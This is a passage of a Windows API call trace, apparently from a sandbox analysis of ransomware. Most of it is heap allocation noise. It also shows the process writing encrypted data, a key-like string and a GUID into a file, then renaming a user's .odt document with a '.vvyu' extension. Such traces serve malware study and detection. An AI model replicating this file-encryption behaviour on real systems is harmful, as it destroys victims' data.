[0197.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0197.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6788 | out: hHeap=0x2c0000) returned 1 [0197.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0197.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0197.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0197.111] GetCurrentThreadId () returned 0x5d8 [0197.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0197.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af25d0 [0197.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0197.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0197.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0197.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0197.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0197.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.112] GetCurrentThreadId () returned 0x5d8 [0197.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0197.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0197.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0197.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0197.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0197.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0197.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0197.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0197.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0197.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0197.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6788 [0197.114] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0197.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0197.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0197.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0197.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0197.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0197.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0197.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0197.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6728 [0197.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0197.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0197.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0197.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0197.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0197.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0197.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0197.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6740 [0197.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0197.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0197.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0197.115] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6710 [0197.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0197.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae67a0 [0197.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0197.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0197.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0197.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6770 [0197.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0197.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6758 [0197.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0197.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae67b8 [0197.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6758 | out: hHeap=0x2c0000) returned 1 [0197.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6758 [0197.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6770 | out: hHeap=0x2c0000) returned 1 [0197.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0197.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0197.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0197.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0197.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0197.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6728 | out: hHeap=0x2c0000) returned 1 [0197.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6728 [0197.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0197.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af4180 [0197.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6788 | out: hHeap=0x2c0000) returned 1 [0197.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0197.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67b8 | out: hHeap=0x2c0000) returned 1 [0197.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4390 [0197.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0197.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0197.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0197.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0197.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6728 | out: hHeap=0x2c0000) returned 1 [0197.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af45a8 [0197.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0197.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0197.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0197.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0197.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0197.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0197.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0197.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4390 | out: hHeap=0x2c0000) returned 1 [0197.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af45a8 | out: hHeap=0x2c0000) returned 1 [0197.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0197.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0197.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6758 | out: hHeap=0x2c0000) returned 1 [0197.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0197.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae67a0 | out: hHeap=0x2c0000) returned 1 [0197.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0197.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6740 | out: hHeap=0x2c0000) returned 1 [0197.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6710 | out: hHeap=0x2c0000) returned 1 [0197.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0197.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0197.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0197.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae66f8 | out: hHeap=0x2c0000) returned 1 [0197.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aea650 | out: hHeap=0x2c0000) returned 1 [0197.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4180 | out: hHeap=0x2c0000) returned 1 [0197.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0197.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0197.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0197.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0197.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0197.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0197.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0197.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0197.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0197.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0197.125] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x2eff, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x2eff, lpOverlapped=0x0) returned 1 [0197.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0197.126] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x2f04, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.126] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0197.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0197.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0197.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0197.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0197.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0197.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0197.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2efb0 | out: hHeap=0x2c0000) returned 1 [0197.128] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0197.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0197.128] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0197.128] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0197.128] CloseHandle (hObject=0x584) returned 1 [0197.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2adfe08 [0197.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8a0) returned 0x2af3f88 [0197.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0197.131] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\y3jGcUeT.odt" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\him fl\\y3jgcuet.odt"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\y3jGcUeT.odt.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\him fl\\y3jgcuet.odt.vvyu")) returned 1 [0197.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0197.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0197.132] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0197.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a245f0 | out: hHeap=0x2c0000) returned 1 [0197.136] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b8d2470, ftCreationTime.dwHighDateTime=0x1d8a2b0, ftLastAccessTime.dwLowDateTime=0x84929c70, ftLastAccessTime.dwHighDateTime=0x1d8a68d, ftLastWriteTime.dwLowDateTime=0x84929c70, ftLastWriteTime.dwHighDateTime=0x1d8a68d, nFileSizeHigh=0x0, nFileSizeLow=0x2f04, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="y3jGcUeT.odt", cAlternateFileName="")) returned 0 [0197.136] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0197.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0197.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b8e8 | out: hHeap=0x2c0000) returned 1 [0197.137] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0197.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b8e8 [0197.137] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0197.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.141] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.141] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0197.141] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2aeaea0 [0197.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.143] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0197.143] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.144] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.144] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0197.144] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0197.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0197.146] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.146] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0197.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0197.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b970 [0197.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b970 | out: hHeap=0x2c0000) returned 1 [0197.151] RtlAllocateHeap 